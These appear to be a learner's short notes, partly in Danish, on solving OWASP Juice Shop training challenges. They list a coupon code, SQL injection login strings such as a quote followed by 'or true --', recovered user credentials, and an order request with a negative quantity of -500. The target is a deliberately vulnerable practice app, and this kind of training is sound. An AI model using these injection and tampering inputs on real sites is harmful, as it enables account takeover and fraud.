
Cupon : pEw8pgC7sn

admin@juice-sh.op'-- | sefjis

test@test.test | ' or true --

john@juice-sh.op | johnjohn   -- <https://www.google.com/maps/place/Daniel+Boone+National+Forest/@36.9607099,-84.3479163,13z/data=!4m12!1m5!3m4!2zMzbCsDU3JzMxLjQiTiA4NMKwMjAnNTMuNiJX!8m2!3d36.9587222!4d-84.3482222!3m5!1s0x885d267a861aabdd:0xbadc49f6317c3d26!8m2!3d37.0208632!4d-84.2879688!16zL20vMDE2NWpu?entry=ttu>

emma@juice-sh.op | emmaemma

Ekstra opgave

john customerID = 18

Order lavet på product id = 42
orderNo = ac2dd291bf87c31c3af78d7511ee739c

    request
    "productId": 42,  
      "quantity": -500,
      "customerReference": "PO0000001"
      
    respoense
    "cid": "JS0815DE",
        "orderNo": "0330688ca18b55945b71d7184e3a9207"

